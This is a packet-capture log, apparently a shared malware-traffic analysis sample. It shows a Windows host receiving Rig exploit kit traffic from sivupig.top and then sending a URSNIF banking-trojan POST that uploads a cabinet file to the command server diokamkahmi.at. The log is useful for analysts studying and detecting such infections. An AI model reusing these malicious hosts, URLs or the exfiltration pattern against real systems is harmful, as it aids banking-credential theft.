Packet Analysis Rig Exploit Kit EK Delivers URSNIF Banking Trojan Malware PCAP file download sample

2016-09-02 10:26:46.478966 IP 192.168.4.200.49222 > 194.165.16.204.80: Flags [P.], seq 1:391, ack 1, win 16537, length 390: HTTP: GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/ HTTP/1.1
E.....@...[..........F.Pbe.c....P.@..P..GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.gaapasa.com.au/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: sivupig.top
Connection: Keep-Alive

2016-09-02 10:26:46.774522 IP 192.168.4.200.49222 > 194.165.16.204.80: Flags [F.], seq 391, ack 5942, win 16402, length 0
E..(..@...\..........F.Pbe.....(P.@./&........
2016-09-02 10:26:47.007595 IP 192.168.4.200.49221 > 194.165.16.204.80: Flags [P.], seq 1:403, ack 1, win 16537, length 402: HTTP: GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/njr.gif HTTP/1.1
E....!@...[;.........E.P$W...YA*P.@.....GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/njr.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.gaapasa.com.au/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: sivupig.top
Connection: Keep-Alive

2016-09-02 10:32:18.729778 IP 192.168.4.200.49233 > 185.39.72.169.80: Flags [P.], seq 1:941, ack 1, win 16537, length 940: HTTP: POST /images/NQ7qefK05DcL/8AQgPQWEUfX/UuqN22NQXUazEl/uuGGDuVwKlZDxDrjGR1I_/2F_2F4ZP67GoFJY4/fjOinZW31vb07eN/rQDpu_2BdxoNTMnJ9o/znRft0UM0/0wGtacJzyDCAKHMyYCnm/RYBzb_2BAKLxzUP3nPm/kQ3rVLpqeH3b1nyPWqpQN6/cA.bmp HTTP/1.1
E.....@...'E.....'H..Q.P..;.p...P.@.j&..POST /images/NQ7qefK05DcL/8AQgPQWEUfX/UuqN22NQXUazEl/uuGGDuVwKlZDxDrjGR1I_/2F_2F4ZP67GoFJY4/fjOinZW31vb07eN/rQDpu_2BdxoNTMnJ9o/znRft0UM0/0wGtacJzyDCAKHMyYCnm/RYBzb_2BAKLxzUP3nPm/kQ3rVLpqeH3b1nyPWqpQN6/cA.bmp HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8d26b8d26b8d26b
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: diokamkahmi.at
Content-Length: 465
Connection: Keep-Alive
Cache-Control: no-cache

-----------------------------8d26b8d26b8d26b
Content-Disposition: form-data; name="upload_file"; filename="CA1E.bin"
Content-Type: application/octet-stream

MSCF............,...................O.......T........."I.D .01D205160934258A0B.=Z....T.CK..M..@.....w...D...p.Mt...CHd .Q/..q.,\h
&m........1"$...'..........2`...............D.T.......E.l...0....\....l.Z....t...'........ .[.......L......j..Ku.W....AS...s_..
-----------------------------8d26b8d26b8d26b--

2016-09-02 10:32:19.386415 IP 185.39.72.169.80 > 192.168.4.200.49233: Flags [.], ack 941, win 64595, length 0
E..(E}@.2.<..'H......P.Qp.....?.P..S....
2016-09-02 10:32:19.386531 IP 185.39.72.169.80 > 192.168.4.200.49233: Flags [P.], seq 1:135, ack 941, win 64595, length 134: HTTP: HTTP/1.1 200 OK
E...E.@.2.;f.'H......P.Qp.....?.P..S@...HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 12:32:03 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
